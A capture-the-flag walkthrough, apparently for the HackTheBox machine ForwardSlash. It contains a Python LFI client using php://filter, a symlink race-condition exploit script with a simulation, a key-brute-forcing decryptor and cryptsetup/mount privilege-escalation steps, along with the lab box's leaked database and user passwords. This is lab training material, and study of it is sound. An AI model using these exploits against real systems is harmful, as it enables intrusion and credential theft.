Basic information

Port scan

The usual 22 and 80 are open:

80

A hosts entry is needed:

10.10.10.183 forwardslash.htb

Directory scan:

gobuster dir -u http://forwardslash.htb/ -w /usr/share/wordlists/dirb/common.txt -x php,txt

This turns up a note.txt:

Pain, we were hacked by some skids that call themselves the "Backslash Gang"... I know... That name... 
Anyway I am just leaving this note here to say that we still have that backup site so we should be fine.

-chiv

backup site

Following the hint and a vhost scan, backup.forwardslash.htb turns up; add it to the hosts file as well:

gobuster vhost -u http://forwardslash.htb/ -w /usr/share/wordlists/dirb/common.txt

Register an account and log in; one feature looks suspicious:

Remove the disabled attribute from the control and test it: the form POSTs a url parameter:

LFI

This is a straightforward LFI:

/etc/passwd

The passwd file gives two usernames:

pain:x:1000:1000:pain:/home/pain:/bin/bash
chiv:x:1001:1001:Chivato,,,:/home/chiv:/bin/bash

config.php

Reading config.php directly gives the database configuration:

define('DB_USERNAME', 'www-data');
define('DB_PASSWORD', '5iIwJX0C2nZiIhkLYE7n314VcKNx8uMkxfLvCTz2USGY180ocz3FQuVtdCy3dAgIMK3Y8XFZv9fBi6OwG6OYxoAVnhaQkm7r2ec');
define('DB_NAME', 'site');

api.php

Some files cannot be read by plain path (permission denied); a PHP stream wrapper such as php://filter works instead:
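As an added example (not code from the box or from this write-up), the following client wraps the file read described above: it builds the php://filter payload, POSTs it as the url parameter, pulls the base64 blob out of whatever HTML comes back, and parses define() pairs out of a config.php. The endpoint name, the cookie handling and the choice of php://filter/convert.base64-encode are assumptions; the page only says the feature POSTs a url parameter and that a PHP wrapper was used.

```python
import base64
import re
import urllib.parse
import urllib.request

# Added example, not code from the box or the write-up. The page only says that the
# suspicious feature on backup.forwardslash.htb POSTs a `url` parameter and that a PHP
# stream wrapper reads files the plain path cannot. The endpoint path, the session
# cookie handling and the choice of php://filter are assumptions.

BASE_URL = "http://backup.forwardslash.htb"
ENDPOINT = "/vulnerable.php"   # hypothetical: the real script name is not on the page


def filter_payload(path: str) -> str:
    """php://filter wrapper that returns the file base64-encoded, so PHP source comes
    back as text instead of being executed by include()."""
    return "php://filter/convert.base64-encode/resource=" + path


def decode_source(body: str) -> str:
    """Pull the longest base64 run out of the response body (it may be wrapped in
    HTML) and decode it as latin-1 so arbitrary bytes survive."""
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not runs:
        return ""
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)          # restore stripped padding, if any
    return base64.b64decode(blob).decode("latin-1")


def parse_defines(php_source: str) -> dict:
    """Extract define('NAME', 'value') pairs, e.g. from config.php."""
    pattern = r"define\(\s*'([A-Z_]+)'\s*,\s*'([^']*)'\s*\)"
    return dict(re.findall(pattern, php_source))


def fetch_source(path: str, cookie: str) -> str:
    """POST the wrapper as the `url` parameter and return the decoded file.
    Needs network access and a logged-in session; not exercised offline."""
    data = urllib.parse.urlencode({"url": filter_payload(path)}).encode()
    req = urllib.request.Request(BASE_URL + ENDPOINT, data=data,
                                 headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return decode_source(resp.read().decode("latin-1"))


def demo() -> dict:
    """Offline check on constructed input: the config.php lines reproduced on the page,
    base64-encoded and wrapped in HTML the way a page would return them."""
    sample = "<?php\n" + "\n".join([
        "define('DB_USERNAME', 'www-data');",
        "define('DB_PASSWORD', 'redacted');",
        "define('DB_NAME', 'site');",
    ])
    wrapped = "<html><body>" + base64.b64encode(sample.encode()).decode() + "</body></html>"
    return parse_defines(decode_source(wrapped))


if __name__ == "__main__":
    print(filter_payload("/etc/passwd"))
    print(demo())
```

The base64 step is what matters for PHP sources: without the filter the included file is executed and only its output is returned, with it the raw source (including the credentials in config.php) is returned verbatim.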

dev/index.php

This yields chiv's credentials:

chiv : N0bodyL1kesBack/

chiv ssh

These credentials work for SSH as chiv, but user.txt is in another user's home directory:

backup race condition

There is a /var/backups directory and a /usr/bin/backup program; running it directly fails with an error:

The error message reveals the filename the program expects under the home directory, which makes a race condition exploitable: plant a symlink under that name before the program is run again:

cat shell.sh
# ask backup which filename it expects (second field of the ERROR line)
i=$(backup | grep ERROR | awk '{print $2}');
# plant a symlink to the protected config.php.bak under that name and run it again
ln -s /var/backups/config.php.bak /home/chiv/$i;/usr/bin/backup;

This yields pain's password:

define('DB_USERNAME', 'pain');
define('DB_PASSWORD', 'db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704');
define('DB_NAME', 'site');
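The shell one-liner above works only when both runs of backup land in the same expected filename; if the name changes between the two runs, the second run just prints another error. The following added example (not the box's /usr/bin/backup and not the write-up's script) models the same flaw in Python so the retry logic can be shown and tested offline. The page only shows the error format and the symlink trick; the naming scheme used here (md5 of the current second) is an assumption that makes the simulation concrete.

```python
import hashlib
import os
import tempfile

# Added example, not the box's /usr/bin/backup. The page shows only that the program
# prints "ERROR <name>" with the filename it expects under the user's home directory and
# that a symlink planted under that name is read on the next run. The naming scheme
# below (md5 of the current second) is an assumption.


def expected_name(now: float) -> str:
    """Assumed: the expected filename is derived from the current second."""
    return hashlib.md5(str(int(now)).encode()).hexdigest()


def vulnerable_backup(home: str, now: float) -> str:
    """Model of the privileged program: read <home>/<expected name> if present
    (following symlinks, which is the flaw), otherwise report the name it wanted."""
    name = expected_name(now)
    path = os.path.join(home, name)
    if not os.path.exists(path):
        return f"ERROR {name} not found"
    with open(path) as f:
        return f.read()


def parse_error(output: str):
    """Same extraction as `grep ERROR | awk '{print $2}'` in the write-up's script."""
    for line in output.splitlines():
        fields = line.split()
        if len(fields) > 1 and fields[0] == "ERROR":
            return fields[1]
    return None


def exploit(home: str, target: str, clock, max_attempts: int = 5):
    """Learn the expected name, plant a symlink to `target` under it and run again.
    If the second rolls over between the two runs the name changes; the stale link is
    removed and a fresh one planted instead of giving up."""
    planted = None
    for _ in range(max_attempts):
        out = vulnerable_backup(home, clock())
        if not out.startswith("ERROR"):
            return out                       # the planted link was picked up
        name = parse_error(out)
        if name is None:
            return None
        if planted and os.path.basename(planted) != name:
            os.unlink(planted)               # second rolled over: drop the stale link
        planted = os.path.join(home, name)
        if not os.path.lexists(planted):
            os.symlink(target, planted)
    return None


def run_demo(timestamps):
    """Constructed scenario: a protected backup file, a writable home directory and a
    scripted clock (each call pops the next value) so a second boundary can be forced."""
    times = list(timestamps)
    clock = lambda: times.pop(0)
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "config.php.bak")
        with open(secret, "w") as f:
            f.write("define('DB_USERNAME', 'pain');\n")
        home = os.path.join(tmp, "home")
        os.mkdir(home)
        return exploit(home, secret, clock)


if __name__ == "__main__":
    print(run_demo([1000.2, 1000.7]))            # same second: works on the first retry
    print(run_demo([1000.9, 1001.1, 1001.4]))    # rollover after planting, then success
```

The root cause being modelled is the same as on the box: a privileged program derives a path from predictable state and then opens it while following symlinks owned by the unprivileged user. Using O_NOFOLLOW (or refusing paths whose owner is not the expected user) on the privileged side removes the race regardless of how fast the attacker is.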

user flag

Switch to pain and read user.txt:

encryptorinator

This directory holds a ciphertext and the encryption/decryption code:

Using that code, write a decryptor that brute-forces the key and recovers the message:

def decrypt(key, msg):
    key = list(key)
    msg = list(msg)
    # Undo the rounds in reverse: each round chained every byte to its neighbour,
    # so walk the message backwards and subtract the key byte plus that neighbour.
    for char_key in reversed(key):
        for i in reversed(range(len(msg))):
            if i == 0:
                tmp = ord(msg[i]) - (ord(char_key) + ord(msg[-1]))
            else:
                tmp = ord(msg[i]) - (ord(char_key) + ord(msg[i-1]))
            while tmp < 0:
                tmp += 256
            msg[i] = chr(tmp)
    return ''.join(msg)


# Read as latin-1 so every raw byte maps to one character (needed on Python 3).
ciphertext = open('ciphertext', 'r', encoding='latin-1').read().rstrip()
# Candidate keys: one repeated printable character, length 1..164.
for i in range(1, 165):
    for j in range(33, 127):
        key = chr(j) * i
        msg = decrypt(key, ciphertext)
        if 'the ' in msg or 'be ' in msg or 'and ' in msg or 'of ' in msg:
            exit("Key: {0}, Key length: {1}, Msg: {2}".format(key, len(key), msg))

Result (the head of the message stays garbled because the guessed key is only partly right, but the tail is readable):

python miao.py
Key: ttttttttttttttttt, Key length: 17, Msg: Hl�vF��;�������&you liked my new encryption tool, pretty secure huh, anyway here is the key to the encrypted image from /var/backups/recovery: cB!6%sdH8Lj^@Y*$C2cf

Information

The recovered message points at the encrypted image:

/var/backups/recovery/encrypted_backup.img

sudo -l also shows that the current user can run cryptsetup, and mount on a specified directory, without a password:

pain's home directory also has a note.txt that explains this:

cat note.txt
Pain, even though they got into our server, I made sure to encrypt any important files and then did some crypto magic on the key... I gave you the key in person the other day, so unless these hackers are some crypto experts we should be good to go.

-chiv

decrypt & mount

# luksOpen prompts for the passphrase: use the key recovered from the encryptorinator message
sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup
mkdir mnt
sudo /bin/mount /dev/mapper/backup ./mnt/
cd mnt/
ls

Inside is an SSH private key:

root flag

This private key allows SSH login as root, giving root.txt:

References